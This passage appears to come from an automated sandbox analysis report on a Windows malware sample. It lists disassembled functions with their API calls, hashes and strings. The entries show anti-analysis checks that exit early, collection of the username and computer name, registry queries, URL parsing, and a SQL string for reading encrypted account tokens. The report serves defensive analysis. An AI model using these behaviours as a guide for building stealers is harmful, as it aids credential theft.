                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                          • API String ID: 2910778473-1079375795
                                                                                          • Opcode ID: 068e2a2c9d0951dbc297878fd7eb8fdf412b42ec459a92f639ef87dc0f618beb
                                                                                          • Instruction ID: 210edd3ff24f1e31e7376af0b8f6dc5aafa9379f597eea4b8f30950ff7929db6
                                                                                          • Opcode Fuzzy Hash: 068e2a2c9d0951dbc297878fd7eb8fdf412b42ec459a92f639ef87dc0f618beb
                                                                                          • Instruction Fuzzy Hash: 32A16271911108ABCF14FBA1DC56EEE7339AF54318F40416EF40772191EF786A98CBAA
                                                                                          Function 00416490 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6C40), ref: 004192B1
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6C58), ref: 004192CA
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6C70), ref: 004192E2
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6C88), ref: 004192FA
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6D18), ref: 00419313
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,00816A40), ref: 0041932B
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,00814678), ref: 00419343
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,00814898), ref: 0041935C
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6CB8), ref: 00419374
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,007F6D48), ref: 0041938C
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,00816FB8), ref: 004193A5
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,00816E08), ref: 004193BD
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,008146F8), ref: 004193D5
                                                                                            • Part of subcall function 00419270: GetProcAddress.KERNEL32(76210000,008170C0), ref: 004193EE
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                            • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
                                                                                            • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                            • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
                                                                                            • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
                                                                                            • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                            • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                            • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                            • Part of subcall function 00416210: GetUserDefaultLangID.KERNEL32(?,?,004164C6,00420ADA), ref: 00416214
                                                                                          • GetUserDefaultLangID.KERNEL32 ref: 004164C6
                                                                                            • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                            • Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
                                                                                            • Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
                                                                                            • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
                                                                                            • Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
                                                                                            • Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
                                                                                            • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00816A50,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00416599
                                                                                          • Sleep.KERNEL32(00001770), ref: 004165A4
                                                                                          • CloseHandle.KERNEL32(?,00000000,?,00816A50,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
                                                                                          • ExitProcess.KERNEL32 ref: 004165C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1125299040-0
                                                                                          • Opcode ID: 50247ecd70c5a0f843e1285b19dc708eb9ca0ab759f18e513338518cb063b549
                                                                                          • Instruction ID: 0c3fac6cf7b50bea5c1f94bc3db5f65e3227356296d56eb517008ea5f4118e6e
                                                                                          • Opcode Fuzzy Hash: 50247ecd70c5a0f843e1285b19dc708eb9ca0ab759f18e513338518cb063b549
                                                                                          • Instruction Fuzzy Hash: 03317130941108BACB14FBF2DC56BEE7739AF18318F50452EF513A6092DFBC6985C66A
                                                                                          Function 00417E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
                                                                                          • wsprintfA.USER32 ref: 00417EF9
                                                                                          • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417F39
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          • RegQueryValueExA.KERNEL32(00000000,0081ACB8,00000000,000F003F,?,00000400), ref: 00417F8C
                                                                                          • lstrlenA.KERNEL32(?), ref: 00417FA1
                                                                                          • RegQueryValueExA.KERNEL32(00000000,0081ACE8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B24), ref: 00418039
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004180A8
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004180BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                          • String ID: %s\%s
                                                                                          • API String ID: 3896182533-4073750446
                                                                                          • Opcode ID: f8d8b98591cc8530eedf35a3a8f93d500dd07e40f4c1d474174918ececd91454
                                                                                          • Instruction ID: 0d61fbe7999a289fff57b0559f919f0328d455d47faa6f76a7bc41a93025e826
                                                                                          • Opcode Fuzzy Hash: f8d8b98591cc8530eedf35a3a8f93d500dd07e40f4c1d474174918ececd91454
                                                                                          • Instruction Fuzzy Hash: 2B211971A0021CABDB24DF54DC85FD9B7B9FB48714F00C199A609A6280DF756AC6CF98
                                                                                          Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CrackInternetlstrlen
                                                                                          • String ID: <
                                                                                          • API String ID: 1274457161-4251816714
                                                                                          • Opcode ID: e5f29cefa4dd9598d5af44d4b7297b32cb790e355d029db3f3dd4240a19260d9
                                                                                          • Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
                                                                                          • Opcode Fuzzy Hash: e5f29cefa4dd9598d5af44d4b7297b32cb790e355d029db3f3dd4240a19260d9
                                                                                          • Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95
                                                                                          Function 00417130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0041714B
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,007F6370,00000000,00020119,00000000), ref: 0041717D
                                                                                          • RegQueryValueExA.KERNEL32(00000000,0081ACD0,00000000,00000000,?,000000FF), ref: 0041719E
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004171A8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID: Windows 11
                                                                                          • API String ID: 3466090806-2517555085
                                                                                          • Opcode ID: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
                                                                                          • Instruction ID: 198b37f2a351322ee600fb862932720b373255b2f394089b4190a5419862cb8c
                                                                                          • Opcode Fuzzy Hash: 7e52da74aeff6e087cb32fc56a687b6502875dfd8540e0d42b3236aa97f07f61
                                                                                          • Instruction Fuzzy Hash: 4C018F74A40208BFEB10DFE4DD49FAE7779EB08710F104098FA0997290D6749A428B64
                                                                                          Function 004171C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004171D4
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004171DB
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,007F6370,00000000,00020119,00417159), ref: 004171FB
                                                                                          • RegQueryValueExA.KERNEL32(00417159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041721A
                                                                                          • RegCloseKey.ADVAPI32(00417159), ref: 00417224
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID: CurrentBuildNumber
                                                                                          • API String ID: 3466090806-1022791448
                                                                                          • Opcode ID: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
                                                                                          • Instruction ID: 00cad297c96af00baba5933f046dbcc6cd847f8af16dedc1aa1025fe7f1f3d79
                                                                                          • Opcode Fuzzy Hash: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
                                                                                          • Instruction Fuzzy Hash: EE014FB9A40708BFDB10DFE0DC4AFAEB779EB08704F104558FA05A7291D674AA418B55
                                                                                          Function 00413BC0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00413BE5
                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0081B718,00000000,00020119,?), ref: 00413C04
                                                                                          • RegQueryValueExA.ADVAPI32(?,0081A670,00000000,00000000,00000000,000000FF), ref: 00413C28
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00413C32
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00413C57
                                                                                          • lstrcat.KERNEL32(?,0081A7F0), ref: 00413C6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                          • String ID:
                                                                                          • API String ID: 2623679115-0
                                                                                          • Opcode ID: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
                                                                                          • Instruction ID: 29de2a712fc1e2dfcbf32ad4341a25eb625067ccdef54b7492a2b75d077fe01c
                                                                                          • Opcode Fuzzy Hash: d4db36429f90b718e22daca015467a858ebeea603ee9fe30967bea3d45dd3f7a
                                                                                          • Instruction Fuzzy Hash: 1841B8B69001086BDB24EBA0DC46FEE733DAB88304F00895DB619561D1FEB957CC8BD5
                                                                                          Function 00413070 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strtok_s.MSVCRT ref: 00413098
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • strtok_s.MSVCRT ref: 004131E1
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpystrtok_s$lstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3184129880-0
                                                                                          • Opcode ID: 56a7a2eaca477f508df01b6ae7b581fc7ce2bfc03d470372eaf33e70fda0dad6
                                                                                          • Instruction ID: 79a306a9ddce9c6cdb539d8aaa48a82ffdeeeca754e5da37ea89086183b8fd1c
                                                                                          • Opcode Fuzzy Hash: 56a7a2eaca477f508df01b6ae7b581fc7ce2bfc03d470372eaf33e70fda0dad6
                                                                                          • Instruction Fuzzy Hash: 87416371E01108ABCB04EFE5DC89AEEB774BF44314F00801EE51677251DB78AA95CF9A
                                                                                          Function 00409A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                          • ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                          • LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
